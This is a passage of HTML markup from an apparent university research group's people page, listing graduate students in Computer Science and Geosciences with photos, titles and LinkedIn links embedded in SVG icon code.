0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-854 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/anupam.jpg\" class=\"wp-image-1624 style-854-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-902 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-855 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-854 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg\" class=\"wp-image-863 style-854-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassini</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-902 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-855 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c111-outer\">\n            <div data-colibri-id=\"182-c111\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c111 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c112\" class=\"d-block style-854 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg\" class=\"wp-image-1094 style-854-image style-local-182-c112-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c112-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-global-transition-all h-heading style-850 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c113\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-851 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Ph.D. Student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"h-text h-text-component style-902 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit-2.jpg\" class=\"wp-image-838 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/sara-edwards1.jpg\" class=\"wp-image-1399 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c104\" class=\"style-855 style-local-182-c104 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c105-outer\">\n            <div data-colibri-id=\"182-c105\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c105 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c106\" class=\"d-block style-854 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg\" class=\"wp-image-1050 style-854-image style-local-182-c106-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c106-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-global-transition-all h-heading style-850 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c107\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-851 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"h-text h-text-component style-902 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c110\" class=\"style-855 style-local-182-c110 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg\" class=\"wp-image-874 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 